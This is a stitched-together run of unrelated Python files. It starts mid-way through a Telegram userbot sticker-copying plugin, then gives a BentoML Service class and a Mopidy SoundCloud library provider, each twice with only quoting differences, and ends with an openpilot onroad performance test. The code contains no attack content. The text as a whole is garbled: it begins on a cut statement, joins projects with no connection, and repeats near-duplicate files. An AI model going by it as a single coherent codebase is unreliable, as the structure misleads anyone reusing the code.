) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/done") else: if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, response) await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/done") await event.edit(f"**Sticker Has Been Kanged SucessFully And Can Be Found** [Here](t.me/addstickers/{packshortname})") @borg.on(admin_cmd(pattern="packinfo")) async def _(event): if event.fwd_from: return if not event.is_reply: await event.edit("Reply to any sticker to get it's pack info.") return rep_msg = await event.get_reply_message() if not rep_msg.document: await event.edit("Reply to any sticker to get it's pack info.") return stickerset_attr_s = rep_msg.document.attributes stickerset_attr = find_instance(stickerset_attr_s, DocumentAttributeSticker) if not stickerset_attr.stickerset: await event.edit("sticker does not belong to a pack.") return get_stickerset = await borg( GetStickerSetRequest( InputStickerSetID( id=stickerset_attr.stickerset.id, access_hash=stickerset_attr.stickerset.access_hash ) ) ) pack_emojis = [] for document_sticker in get_stickerset.packs: if document_sticker.emoticon not in pack_emojis: pack_emojis.append(document_sticker.emoticon) await event.edit(f"**Sticker Title:** `{get_stickerset.set.title}\n`" f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" f"**Official:** `{get_stickerset.set.official}`\n" f"**Archived:** `{get_stickerset.set.archived}`\n" f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" f"**Emojis In Pack:** {' '.join(pack_emojis)}") @borg.on(admin_cmd(pattern="getsticker ?(.*)")) async def _(event): if event.fwd_from: return input_str = event.pattern_match.group(1) if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY): os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY) if event.reply_to_msg_id: reply_message = await event.get_reply_message() # https://gist.github.com/udf/e4e3dbb2e831c8b580d8fddd312714f7 if not reply_message.sticker: return sticker = reply_message.sticker sticker_attrib = find_instance(sticker.attributes, DocumentAttributeSticker) if not sticker_attrib.stickerset: await event.reply("This sticker is not part of a pack") return is_a_s = is_it_animated_sticker(reply_message) file_ext_ns_ion = "webp" file_caption = "https://t.me/RoseSupport/33801" if is_a_s: file_ext_ns_ion = "tgs" file_caption = "Forward the ZIP file to @AnimatedStickersRoBot to get lottIE JSON containing the vector information." sticker_set = await borg(GetStickerSetRequest(sticker_attrib.stickerset)) pack_file = os.path.join(Config.TMP_DOWNLOAD_DIRECTORY, sticker_set.set.short_name, "pack.txt") if os.path.isfile(pack_file): os.remove(pack_file) # Sticker emojis are retrieved as a mapping of # <emoji>: <list of document ids that have this emoji> # So we need to build a mapping of <document id>: <list of emoji> # Thanks, Durov emojis = defaultdict(str) for pack in sticker_set.packs: for document_id in pack.documents: emojis[document_id] += pack.emoticon async def download(sticker, emojis, path, file): await borg.download_media(sticker, file=os.path.join(path, file)) with open(pack_file, "a") as f: f.write(f"{{'image_file': '{file}','emojis':{emojis[sticker.id]}}},") pending_tasks = [ asyncio.ensure_future( download(document, emojis, Config.TMP_DOWNLOAD_DIRECTORY + sticker_set.set.short_name, f"{i:03d}.{file_ext_ns_ion}") ) for i, document in enumerate(sticker_set.documents) ] await event.edit(f"Downloading {sticker_set.set.count} sticker(s) to .{Config.TMP_DOWNLOAD_DIRECTORY}{sticker_set.set.short_name}...") num_tasks = len(pending_tasks) while 1: done, pending_tasks = await asyncio.wait(pending_tasks, timeout=2.5, return_when=asyncio.FIRST_COMPLETED) try: await event.edit( f"Downloaded {num_tasks - len(pending_tasks)}/{sticker_set.set.count}") except MessageNotModifiedError: pass if not pending_tasks: break await event.edit("Downloading to my local completed") # https://gist.github.com/udf/e4e3dbb2e831c8b580d8fddd312714f7 directory_name = Config.TMP_DOWNLOAD_DIRECTORY + sticker_set.set.short_name zipf = zipfile.ZipFile(directory_name + ".zip", "w", zipfile.ZIP_DEFLATED) zipdir(directory_name, zipf) zipf.close() await borg.send_file( event.chat_id, directory_name + ".zip", caption=file_caption, force_document=True, allow_cache=False, reply_to=event.message.id, progress_callback=progress ) try: os.remove(directory_name + ".zip") os.remove(directory_name) except: pass await event.edit("task Completed") await asyncio.sleep(3) await event.delete() else: await event.edit("TODO: Not Implemented") # Helpers def is_it_animated_sticker(message): try: if message.media and message.media.document: mime_type = message.media.document.mime_type if "tgsticker" in mime_type: return True else: return False else: return False except: return False def is_message_image(message): if message.media: if isinstance(message.media, MessageMediaPhoto): return True if message.media.document: if message.media.document.mime_type.split("/")[0] == "image": return True return False return False async def silently_send_message(conv, text): await conv.send_message(text) response = await conv.get_response() await conv.mark_read(message=response) return response async def stickerset_exists(conv, setname): try: await borg(GetStickerSetRequest(InputStickerSetShortName(setname))) response = await silently_send_message(conv, "/addsticker") if response.text == "Invalid pack selected.": await silently_send_message(conv, "/cancel") return False await silently_send_message(conv, "/cancel") return True except StickersetInvalidError: return False def resize_image(image, save_locaton): """ Copyright Rhyse Simpson: https://github.com/skittles9823/SkittBot/blob/master/tg_bot/modules/stickers.py """ im = Image.open(image) maxsize = (512, 512) if (im.width and im.height) < 512: size1 = im.width size2 = im.height if im.width > im.height: scale = 512 / size1 size1new = 512 size2new = size2 * scale else: scale = 512 / size2 size1new = size1 * scale size2new = 512 size1new = math.floor(size1new) size2new = math.floor(size2new) sizenew = (size1new, size2new) im = im.resize(sizenew) else: im.thumbnail(maxsize) im.save(save_locaton, "PNG") def progress(current, total): logger.info("Uploaded: {} of {}\nCompleted {}".format(current, total, (current / total) * 100)) def find_instance(items, class_or_tuple): for item in items: if isinstance(item, class_or_tuple): return item return None def zipdir(path, ziph): # ziph is zipfile handle for root, dirs, files in os.walk(path): for file in files: ziph.write(os.path.join(root, file)) os.remove(os.path.join(root, file))
import sys import typing as t import logging from typing import TYPE_CHECKING from bentoml import Runner from bentoml import SimpleRunner from bentoml.io import IODescriptor from bentoml.exceptions import BentoMLException from ..types import Tag from ..bento.bento import get_default_bento_readme from .inference_api import InferenceAPI from ..utils.validation import validate_tag_str if TYPE_CHECKING: from .. import ext_typing as ext from ..bento import Bento WSGI_APP = t.Callable[ [t.Callable[..., t.Any], t.Mapping[str, t.Any]], t.Iterable[bytes] ] logger = logging.getLogger(__name__) class Service: """The service definition is the manifestation of the Service Oriented Architecture and the core building block in BentoML where users define the service runtime architecture and model serving logic. A BentoML service is defined via instantiate this Service class. When creating a Service instance, user must provide a Service name and list of runners that are required by this Service. The instance can then be used to define InferenceAPIs via the `api` decorator. """ apis: t.Dict[str, InferenceAPI] = {} # Name of the service, it is a required parameter for __init__ name: str # Tag/Bento/Version are only applicable if the service was load from a bento tag: t.Optional[Tag] = None bento: t.Optional["Bento"] = None version: t.Optional[str] = None # Working dir of the service, set when the service was load from a bento _working_dir: t.Optional[str] = None # Import path set by .loader.import_service method _import_str: t.Optional[str] = None # For docs property _doc: t.Optional[str] = None def __init__( self, name: str, runners: "t.Optional[t.List[t.Union[Runner, SimpleRunner]]]" = None, ): lower_name = name.lower() if name != lower_name: logger.warning(f"converting {name} to lowercase: {lower_name}") # Service name must be a valid dns1123 subdomain string validate_tag_str(lower_name) self.name = lower_name if runners is not None: self.runners = {} for r in runners: if r.name in self.runners: raise ValueError( f"Found duplicate name `{r.name}` in service runners." ) assert isinstance( r, (Runner, SimpleRunner) ), "Service runners list must only contain runner instances" self.runners[r.name] = r else: self.runners: t.Dict[str, "t.Union[Runner, SimpleRunner]"] = {} self.mount_apps: t.List[t.Tuple["ext.ASGIApp", str, str]] = [] self.middlewares: t.List[ t.Tuple[t.Type["ext.AsgiMiddleware"], t.Dict[str, t.Any]] ] = [] def on_asgi_app_startup(self) -> None: # TODO: initialize Local Runner instances or Runner Clients here # TODO(P1): add `@svc.on_startup` decorator for adding user-defined hook pass def on_asgi_app_shutdown(self) -> None: # TODO(P1): add `@svc.on_shutdown` decorator for adding user-defined hook pass def __del__(self): # working dir was added to sys.path in the .loader.import_service function if self._working_dir and sys.path: sys.path.remove(self._working_dir) def api( self, input: IODescriptor[t.Any], # pylint: disable=redefined-builtin output: IODescriptor[t.Any], name: t.Optional[str] = None, doc: t.Optional[str] = None, route: t.Optional[str] = None, ) -> t.Callable[[t.Callable[..., t.Any]], t.Callable[..., t.Any]]: """Decorator for adding InferenceAPI to this service""" D = t.TypeVar("D", bound=t.Callable[..., t.Any]) def decorator(func: D) -> D: from ..io_descriptors import Multipart if isinstance(output, Multipart): logger.warning( f"Found Multipart as the output of API `{name or func.__name__}`. " "Multipart response is rarely used in the real world," " less clients/browsers support it. " "Make sure you know what you are doing." ) self._add_inference_api(func, input, output, name, doc, route) return func return decorator def _add_inference_api( self, func: t.Callable[..., t.Any], input: IODescriptor[t.Any], # pylint: disable=redefined-builtin output: IODescriptor[t.Any], name: t.Optional[str], doc: t.Optional[str], route: t.Optional[str], ) -> None: api = InferenceAPI( name=name, user_defined_callback=func, input_descriptor=input, output_descriptor=output, doc=doc, route=route, ) if api.name in self.apis: raise BentoMLException( f"API {api.name} is already defined in Service {self.name}" ) self.apis[api.name] = api @property def asgi_app(self) -> "ext.ASGIApp": from ..server.service_app import ServiceAppFactory return ServiceAppFactory(self)() def mount_asgi_app( self, app: "ext.ASGIApp", path: str = "/", name: t.Optional[str] = None ) -> None: self.mount_apps.append((app, path, name)) # type: ignore def mount_wsgi_app( self, app: WSGI_APP, path: str = "/", name: t.Optional[str] = None ) -> None: from starlette.middleware.wsgi import WSGIMiddleware self.mount_apps.append((WSGIMiddleware(app), path, name)) # type: ignore def add_asgi_middleware( self, middleware_cls: t.Type["ext.AsgiMiddleware"], **options: t.Any ) -> None: self.middlewares.append((middleware_cls, options)) def openapi_doc(self): from .openapi import get_service_openapi_doc return get_service_openapi_doc(self) def __str__(self): if self.bento: return f'bentoml.Service(tag="{self.tag}", ' f'path="{self.bento.path}")' elif self._import_str and self._working_dir: return ( f'bentoml.Service(name="{self.name}", ' f'import_str="{self._import_str}", ' f'working_dir="{self._working_dir}")' ) else: return ( f'bentoml.Service(name="{self.name}", ' f'runners=[{','.join(self.runners.keys())}])' ) def __repr__(self): return self.__str__() @property def doc(self) -> str: if self.bento is not None: return self.bento.doc return get_default_bento_readme(self)
import sys import typing as t import logging from typing import TYPE_CHECKING from bentoml import Runner from bentoml import SimpleRunner from bentoml.io import IODescriptor from bentoml.exceptions import BentoMLException from ..types import Tag from ..bento.bento import get_default_bento_readme from .inference_api import InferenceAPI from ..utils.validation import validate_tag_str if TYPE_CHECKING: from .. import ext_typing as ext from ..bento import Bento WSGI_APP = t.Callable[ [t.Callable[..., t.Any], t.Mapping[str, t.Any]], t.Iterable[bytes] ] logger = logging.getLogger(__name__) class Service: """The service definition is the manifestation of the Service Oriented Architecture and the core building block in BentoML where users define the service runtime architecture and model serving logic. A BentoML service is defined via instantiate this Service class. When creating a Service instance, user must provide a Service name and list of runners that are required by this Service. The instance can then be used to define InferenceAPIs via the `api` decorator. """ apis: t.Dict[str, InferenceAPI] = {} # Name of the service, it is a required parameter for __init__ name: str # Tag/Bento/Version are only applicable if the service was load from a bento tag: t.Optional[Tag] = None bento: t.Optional["Bento"] = None version: t.Optional[str] = None # Working dir of the service, set when the service was load from a bento _working_dir: t.Optional[str] = None # Import path set by .loader.import_service method _import_str: t.Optional[str] = None # For docs property _doc: t.Optional[str] = None def __init__( self, name: str, runners: "t.Optional[t.List[t.Union[Runner, SimpleRunner]]]" = None, ): lower_name = name.lower() if name != lower_name: logger.warning(f"converting {name} to lowercase: {lower_name}") # Service name must be a valid dns1123 subdomain string validate_tag_str(lower_name) self.name = lower_name if runners is not None: self.runners = {} for r in runners: if r.name in self.runners: raise ValueError( f"Found duplicate name `{r.name}` in service runners." ) assert isinstance( r, (Runner, SimpleRunner) ), "Service runners list must only contain runner instances" self.runners[r.name] = r else: self.runners: t.Dict[str, "t.Union[Runner, SimpleRunner]"] = {} self.mount_apps: t.List[t.Tuple["ext.ASGIApp", str, str]] = [] self.middlewares: t.List[ t.Tuple[t.Type["ext.AsgiMiddleware"], t.Dict[str, t.Any]] ] = [] def on_asgi_app_startup(self) -> None: # TODO: initialize Local Runner instances or Runner Clients here # TODO(P1): add `@svc.on_startup` decorator for adding user-defined hook pass def on_asgi_app_shutdown(self) -> None: # TODO(P1): add `@svc.on_shutdown` decorator for adding user-defined hook pass def __del__(self): # working dir was added to sys.path in the .loader.import_service function if self._working_dir and sys.path: sys.path.remove(self._working_dir) def api( self, input: IODescriptor[t.Any], # pylint: disable=redefined-builtin output: IODescriptor[t.Any], name: t.Optional[str] = None, doc: t.Optional[str] = None, route: t.Optional[str] = None, ) -> t.Callable[[t.Callable[..., t.Any]], t.Callable[..., t.Any]]: """Decorator for adding InferenceAPI to this service""" D = t.TypeVar("D", bound=t.Callable[..., t.Any]) def decorator(func: D) -> D: from ..io_descriptors import Multipart if isinstance(output, Multipart): logger.warning( f"Found Multipart as the output of API `{name or func.__name__}`. " "Multipart response is rarely used in the real world," " less clients/browsers support it. " "Make sure you know what you are doing." ) self._add_inference_api(func, input, output, name, doc, route) return func return decorator def _add_inference_api( self, func: t.Callable[..., t.Any], input: IODescriptor[t.Any], # pylint: disable=redefined-builtin output: IODescriptor[t.Any], name: t.Optional[str], doc: t.Optional[str], route: t.Optional[str], ) -> None: api = InferenceAPI( name=name, user_defined_callback=func, input_descriptor=input, output_descriptor=output, doc=doc, route=route, ) if api.name in self.apis: raise BentoMLException( f"API {api.name} is already defined in Service {self.name}" ) self.apis[api.name] = api @property def asgi_app(self) -> "ext.ASGIApp": from ..server.service_app import ServiceAppFactory return ServiceAppFactory(self)() def mount_asgi_app( self, app: "ext.ASGIApp", path: str = "/", name: t.Optional[str] = None ) -> None: self.mount_apps.append((app, path, name)) # type: ignore def mount_wsgi_app( self, app: WSGI_APP, path: str = "/", name: t.Optional[str] = None ) -> None: from starlette.middleware.wsgi import WSGIMiddleware self.mount_apps.append((WSGIMiddleware(app), path, name)) # type: ignore def add_asgi_middleware( self, middleware_cls: t.Type["ext.AsgiMiddleware"], **options: t.Any ) -> None: self.middlewares.append((middleware_cls, options)) def openapi_doc(self): from .openapi import get_service_openapi_doc return get_service_openapi_doc(self) def __str__(self): if self.bento: return f'bentoml.Service(tag="{self.tag}", ' f'path="{self.bento.path}")' elif self._import_str and self._working_dir: return ( f'bentoml.Service(name="{self.name}", ' f'import_str="{self._import_str}", ' f'working_dir="{self._working_dir}")' ) else: return ( f'bentoml.Service(name="{self.name}", ' f'runners=[{",".join(self.runners.keys())}])' ) def __repr__(self): return self.__str__() @property def doc(self) -> str: if self.bento is not None: return self.bento.doc return get_default_bento_readme(self)
import collections import logging import re import urllib.parse from mopidy import backend, models from mopidy.models import SearchResult, Track logger = logging.getLogger(__name__) def generate_uri(path): return f"soundcloud:directory:{urllib.parse.quote("/".join(path))}" def new_folder(name, path): return models.Ref.directory(uri=generate_uri(path), name=name) def simplify_search_query(query): if isinstance(query, dict): r = [] for v in query.values(): if isinstance(v, list): r.extend(v) else: r.append(v) return " ".join(r) if isinstance(query, list): return " ".join(query) else: return query class SoundCloudLibraryProvider(backend.LibraryProvider): root_directory = models.Ref.directory( uri="soundcloud:directory", name="SoundCloud" ) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.vfs = {"soundcloud:directory": {}} self.add_to_vfs(new_folder("Following", ["following"])) self.add_to_vfs(new_folder("Liked", ["liked"])) self.add_to_vfs(new_folder("Sets", ["sets"])) self.add_to_vfs(new_folder("Stream", ["stream"])) def add_to_vfs(self, _model): self.vfs["soundcloud:directory"][_model.uri] = _model def list_sets(self): sets_vfs = collections.OrderedDict() for (name, set_id, _tracks) in self.backend.remote.get_sets(): sets_list = new_folder(name, ["sets", set_id]) logger.debug(f"Adding set {sets_list.name} to VFS") sets_vfs[set_id] = sets_list return list(sets_vfs.values()) def list_liked(self): vfs_list = collections.OrderedDict() for track in self.backend.remote.get_likes(): logger.debug(f"Adding liked track {track.name} to VFS") vfs_list[track.name] = models.Ref.track( uri=track.uri, name=track.name ) return list(vfs_list.values()) def list_user_follows(self): sets_vfs = collections.OrderedDict() for (name, user_id) in self.backend.remote.get_followings(): sets_list = new_folder(name, ["following", user_id]) logger.debug(f"Adding set {sets_list.name} to VFS") sets_vfs[user_id] = sets_list return list(sets_vfs.values()) def tracklist_to_vfs(self, track_list): vfs_list = collections.OrderedDict() for temp_track in track_list: if not isinstance(temp_track, Track): temp_track = self.backend.remote.parse_track(temp_track) if hasattr(temp_track, "uri"): vfs_list[temp_track.name] = models.Ref.track( uri=temp_track.uri, name=temp_track.name ) return list(vfs_list.values()) def browse(self, uri): if not self.vfs.get(uri): (req_type, res_id) = re.match(r".*:(\w*)(?:/(\d*))?", uri).groups() # Sets if "sets" == req_type: if res_id: return self.tracklist_to_vfs( self.backend.remote.get_set(res_id) ) else: return self.list_sets() # Following if "following" == req_type: if res_id: return self.tracklist_to_vfs( self.backend.remote.get_tracks(res_id) ) else: return self.list_user_follows() # Liked if "liked" == req_type: return self.list_liked() # User stream if "stream" == req_type: return self.tracklist_to_vfs( self.backend.remote.get_user_stream() ) # root directory return list(self.vfs.get(uri, {}).values()) def search(self, query=None, uris=None, exact=False): # TODO Support exact search if not query: return if "uri" in query: search_query = "".join(query["uri"]) url = urllib.parse.urlparse(search_query) if "soundcloud.com" in url.netloc: logger.info(f"Resolving SoundCloud for: {search_query}") return SearchResult( uri="soundcloud:search", tracks=self.backend.remote.resolve_url(search_query), ) else: search_query = simplify_search_query(query) logger.info(f"Searching SoundCloud for: {search_query}") return SearchResult( uri="soundcloud:search", tracks=self.backend.remote.search(search_query), ) def lookup(self, uri): if "sc:" in uri: uri = uri.replace("sc:", "") return self.backend.remote.resolve_url(uri) try: track_id = self.backend.remote.parse_track_uri(uri) track = self.backend.remote.get_track(track_id) if track is None: logger.info( f"Failed to lookup {uri}: SoundCloud track not found" ) return [] return [track] except Exception as error: logger.error(f"Failed to lookup {uri}: {error}") return []
import collections import logging import re import urllib.parse from mopidy import backend, models from mopidy.models import SearchResult, Track logger = logging.getLogger(__name__) def generate_uri(path): return f"soundcloud:directory:{urllib.parse.quote('/'.join(path))}" def new_folder(name, path): return models.Ref.directory(uri=generate_uri(path), name=name) def simplify_search_query(query): if isinstance(query, dict): r = [] for v in query.values(): if isinstance(v, list): r.extend(v) else: r.append(v) return " ".join(r) if isinstance(query, list): return " ".join(query) else: return query class SoundCloudLibraryProvider(backend.LibraryProvider): root_directory = models.Ref.directory( uri="soundcloud:directory", name="SoundCloud" ) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.vfs = {"soundcloud:directory": {}} self.add_to_vfs(new_folder("Following", ["following"])) self.add_to_vfs(new_folder("Liked", ["liked"])) self.add_to_vfs(new_folder("Sets", ["sets"])) self.add_to_vfs(new_folder("Stream", ["stream"])) def add_to_vfs(self, _model): self.vfs["soundcloud:directory"][_model.uri] = _model def list_sets(self): sets_vfs = collections.OrderedDict() for (name, set_id, _tracks) in self.backend.remote.get_sets(): sets_list = new_folder(name, ["sets", set_id]) logger.debug(f"Adding set {sets_list.name} to VFS") sets_vfs[set_id] = sets_list return list(sets_vfs.values()) def list_liked(self): vfs_list = collections.OrderedDict() for track in self.backend.remote.get_likes(): logger.debug(f"Adding liked track {track.name} to VFS") vfs_list[track.name] = models.Ref.track( uri=track.uri, name=track.name ) return list(vfs_list.values()) def list_user_follows(self): sets_vfs = collections.OrderedDict() for (name, user_id) in self.backend.remote.get_followings(): sets_list = new_folder(name, ["following", user_id]) logger.debug(f"Adding set {sets_list.name} to VFS") sets_vfs[user_id] = sets_list return list(sets_vfs.values()) def tracklist_to_vfs(self, track_list): vfs_list = collections.OrderedDict() for temp_track in track_list: if not isinstance(temp_track, Track): temp_track = self.backend.remote.parse_track(temp_track) if hasattr(temp_track, "uri"): vfs_list[temp_track.name] = models.Ref.track( uri=temp_track.uri, name=temp_track.name ) return list(vfs_list.values()) def browse(self, uri): if not self.vfs.get(uri): (req_type, res_id) = re.match(r".*:(\w*)(?:/(\d*))?", uri).groups() # Sets if "sets" == req_type: if res_id: return self.tracklist_to_vfs( self.backend.remote.get_set(res_id) ) else: return self.list_sets() # Following if "following" == req_type: if res_id: return self.tracklist_to_vfs( self.backend.remote.get_tracks(res_id) ) else: return self.list_user_follows() # Liked if "liked" == req_type: return self.list_liked() # User stream if "stream" == req_type: return self.tracklist_to_vfs( self.backend.remote.get_user_stream() ) # root directory return list(self.vfs.get(uri, {}).values()) def search(self, query=None, uris=None, exact=False): # TODO Support exact search if not query: return if "uri" in query: search_query = "".join(query["uri"]) url = urllib.parse.urlparse(search_query) if "soundcloud.com" in url.netloc: logger.info(f"Resolving SoundCloud for: {search_query}") return SearchResult( uri="soundcloud:search", tracks=self.backend.remote.resolve_url(search_query), ) else: search_query = simplify_search_query(query) logger.info(f"Searching SoundCloud for: {search_query}") return SearchResult( uri="soundcloud:search", tracks=self.backend.remote.search(search_query), ) def lookup(self, uri): if "sc:" in uri: uri = uri.replace("sc:", "") return self.backend.remote.resolve_url(uri) try: track_id = self.backend.remote.parse_track_uri(uri) track = self.backend.remote.get_track(track_id) if track is None: logger.info( f"Failed to lookup {uri}: SoundCloud track not found" ) return [] return [track] except Exception as error: logger.error(f"Failed to lookup {uri}: {error}") return []
#!/usr/bin/env python3 import json import os import subprocess import time import numpy as np import unittest from collections import Counter from pathlib import Path from cereal import car import cereal.messaging as messaging from cereal.services import service_list from common.basedir import BASEDIR from common.timeout import Timeout from common.params import Params from selfdrive.controls.lib.events import EVENTS, ET from selfdrive.loggerd.config import ROOT from selfdrive.test.helpers import set_params_enabled, release_only from tools.lib.logreader import LogReader # Baseline CPU usage by process PROCS = { "selfdrive.controls.controlsd": 35.0, "./loggerd": 10.0, "./encoderd": 12.5, "./camerad": 16.5, "./locationd": 9.1, "selfdrive.controls.plannerd": 11.7, "./_ui": 26.4, "selfdrive.locationd.paramsd": 9.0, "./_sensord": 6.17, "selfdrive.controls.radard": 4.5, "./_modeld": 4.48, "./boardd": 3.63, "./_dmonitoringmodeld": 10.0, "selfdrive.thermald.thermald": 3.87, "selfdrive.locationd.calibrationd": 2.0, "./_soundd": 1.0, "selfdrive.monitoring.dmonitoringd": 1.90, "./proclogd": 1.54, "system.logmessaged": 0.2, "./clocksd": 0.02, "./ubloxd": 0.02, "selfdrive.tombstoned": 0, "./logcatd": 0, } TIMINGS = { # rtols: max/min, rsd "can": [2.5, 0.35], "pandaStates": [2.5, 0.35], "peripheralState": [2.5, 0.35], "sendcan": [2.5, 0.35], "carState": [2.5, 0.35], "carControl": [2.5, 0.35], "controlsState": [2.5, 0.35], "lateralPlan": [2.5, 0.5], "longitudinalPlan": [2.5, 0.5], "roadCameraState": [2.5, 0.35], "driverCameraState": [2.5, 0.35], "modelV2": [2.5, 0.35], "driverState": [2.5, 0.40], "liveLocationKalman": [2.5, 0.35], "wideRoadCameraState": [1.5, 0.35], } def cputime_total(ct): return ct.cpuUser + ct.cpuSystem + ct.cpuChildrenUser + ct.cpuChildrenSystem def check_cpu_usage(first_proc, last_proc): result = "\n" result += "------------------------------------------------\n" result += "------------------ CPU Usage -------------------\n" result += "------------------------------------------------\n" r = True dt = (last_proc.logMonoTime - first_proc.logMonoTime) / 1e9 for proc_name, normal_cpu_usage in PROCS.items(): err = "" first, last = None, None try: first = [p for p in first_proc.procLog.procs if proc_name in p.cmdline][0] last = [p for p in last_proc.procLog.procs if proc_name in p.cmdline][0] cpu_time = cputime_total(last) - cputime_total(first) cpu_usage = cpu_time / dt * 100. if cpu_usage > max(normal_cpu_usage * 1.15, normal_cpu_usage + 5.0): # cpu usage is high while playing sounds if not (proc_name == "./_soundd" and cpu_usage < 65.): err = "using more CPU than normal" elif cpu_usage < min(normal_cpu_usage * 0.65, max(normal_cpu_usage - 1.0, 0.0)): err = "using less CPU than normal" except IndexError: err = f"NO METRICS FOUND {first=} {last=}\n" result += f"{proc_name.ljust(35)} {cpu_usage:5.2f}% ({normal_cpu_usage:5.2f}%) {err}\n" if len(err) > 0: r = False result += "------------------------------------------------\n" print(result) return r class TestOnroad(unittest.TestCase): @classmethod def setUpClass(cls): if "DEBUG" in os.environ: segs = filter(lambda x: os.path.exists(os.path.join(x, "rlog")), Path(ROOT).iterdir()) segs = sorted(segs, key=lambda x: x.stat().st_mtime) cls.lr = list(LogReader(os.path.join(segs[-1], "rlog"))) return # setup env os.environ['REPLAY'] = "1" os.environ['SKIP_FW_QUERY'] = "1" os.environ['FINGERPRINT'] = "TOYOTA COROLLA TSS2 2019" params = Params() params.clear_all() set_params_enabled() # Make sure athena isn't running os.system("pkill -9 -f athena") # start manager and run openpilot for a minute proc = None try: manager_path = os.path.join(BASEDIR, "selfdrive/manager/manager.py") proc = subprocess.Popen(["python", manager_path]) sm = messaging.SubMaster(['carState']) with Timeout(150, "controls didn't start"): while sm.rcv_frame['carState'] < 0: sm.update(1000) # make sure we get at least two full segments route = None cls.segments = [] with Timeout(300, "timed out waiting for logs"): while route is None: route = params.get("CurrentRoute", encoding="utf-8") time.sleep(0.1) while len(cls.segments) < 3: segs = set() if Path(ROOT).exists(): segs = set(Path(ROOT).glob(f"{route}--*")) cls.segments = sorted(segs, key=lambda s: int(str(s).rsplit('--')[-1])) time.sleep(2) # chop off last, incomplete segment cls.segments = cls.segments[:-1] finally: if proc is not None: proc.terminate() if proc.wait(60) is None: proc.kill() cls.lrs = [list(LogReader(os.path.join(str(s), "rlog"))) for s in cls.segments] # use the second segment by default as it's the first full segment cls.lr = list(LogReader(os.path.join(str(cls.segments[1]), "rlog"))) def test_cloudlog_size(self): msgs = [m for m in self.lr if m.which() == 'logMessage'] total_size = sum(len(m.as_builder().to_bytes()) for m in msgs) self.assertLess(total_size, 3.5e5) cnt = Counter(json.loads(m.logMessage)['filename'] for m in msgs) big_logs = [f for f, n in cnt.most_common(3) if n / sum(cnt.values()) > 30.] self.assertEqual(len(big_logs), 0, f"Log spam: {big_logs}") def test_cpu_usage(self): proclogs = [m for m in self.lr if m.which() == 'procLog'] self.assertGreater(len(proclogs), service_list['procLog'].frequency * 45, "insufficient samples") cpu_ok = check_cpu_usage(proclogs[0], proclogs[-1]) self.assertTrue(cpu_ok) def test_camera_processing_time(self): result = "\n" result += "------------------------------------------------\n" result += "-------------- Debayer Timing ------------------\n" result += "------------------------------------------------\n" ts = [getattr(getattr(m, m.which()), "processingTime") for m in self.lr if 'CameraState' in m.which()] self.assertLess(min(ts), 0.025, f"high execution time: {min(ts)}") result += f"execution time: min {min(ts):.5f}s\n" result += f"execution time: max {max(ts):.5f}s\n" result += f"execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_mpc_execution_timings(self): result = "\n" result += "------------------------------------------------\n" result += "----------------- MPC Timing ------------------\n" result += "------------------------------------------------\n" cfgs = [("lateralPlan", 0.05, 0.05), ("longitudinalPlan", 0.05, 0.05)] for (s, instant_max, avg_max) in cfgs: ts = [getattr(getattr(m, s), "solverExecutionTime") for m in self.lr if m.which() == s] self.assertLess(max(ts), instant_max, f"high '{s}' execution time: {max(ts)}") self.assertLess(np.mean(ts), avg_max, f"high avg '{s}' execution time: {np.mean(ts)}") result += f"'{s}' execution time: min {min(ts):.5f}s\n" result += f"'{s}' execution time: max {max(ts):.5f}s\n" result += f"'{s}' execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_model_execution_timings(self): result = "\n" result += "------------------------------------------------\n" result += "----------------- Model Timing -----------------\n" result += "------------------------------------------------\n" # TODO: this went up when plannerd cpu usage increased, why? cfgs = [ ("modelV2", 0.050, 0.036), ("driverState", 0.050, 0.026), ] for (s, instant_max, avg_max) in cfgs: ts = [getattr(getattr(m, s), "modelExecutionTime") for m in self.lr if m.which() == s] self.assertLess(max(ts), instant_max, f"high '{s}' execution time: {max(ts)}") self.assertLess(np.mean(ts), avg_max, f"high avg '{s}' execution time: {np.mean(ts)}") result += f"'{s}' execution time: min {min(ts):.5f}s\n" result += f"'{s}' execution time: max {max(ts):.5f}s\n" result += f"'{s}' execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_timings(self): passed = True result = "\n" result += "------------------------------------------------\n" result += "----------------- Service Timings --------------\n" result += "------------------------------------------------\n" for s, (maxmin, rsd) in TIMINGS.items(): msgs = [m.logMonoTime for m in self.lr if m.which() == s] if not len(msgs): raise Exception(f"missing {s}") ts = np.diff(msgs) / 1e9 dt = 1 / service_list[s].frequency try: np.testing.assert_allclose(np.mean(ts), dt, rtol=0.03, err_msg=f"{s} - failed mean timing check") np.testing.assert_allclose([np.max(ts), np.min(ts)], dt, rtol=maxmin, err_msg=f"{s} - failed max/min timing check") except Exception as e: result += str(e) + "\n" passed = False if np.std(ts) / dt > rsd: result += f"{s} - failed RSD timing check\n" passed = False result += f"{s.ljust(40)}: {np.array([np.mean(ts), np.max(ts), np.min(ts)])*1e3}\n" result += f"{"".ljust(40)} {np.max(np.absolute([np.max(ts)/dt, np.min(ts)/dt]))} {np.std(ts)/dt}\n" result += "="*67 print(result) self.assertTrue(passed) @release_only def test_startup(self): startup_alert = None for msg in self.lrs[0]: # can't use carEvents because the first msg can be dropped while loggerd is starting up if msg.which() == "controlsState": startup_alert = msg.controlsState.alertText1 break expected = EVENTS[car.CarEvent.EventName.startup][ET.PERMANENT].alert_text_1 self.assertEqual(startup_alert, expected, "wrong startup alert") if __name__ == "__main__": unittest.main()
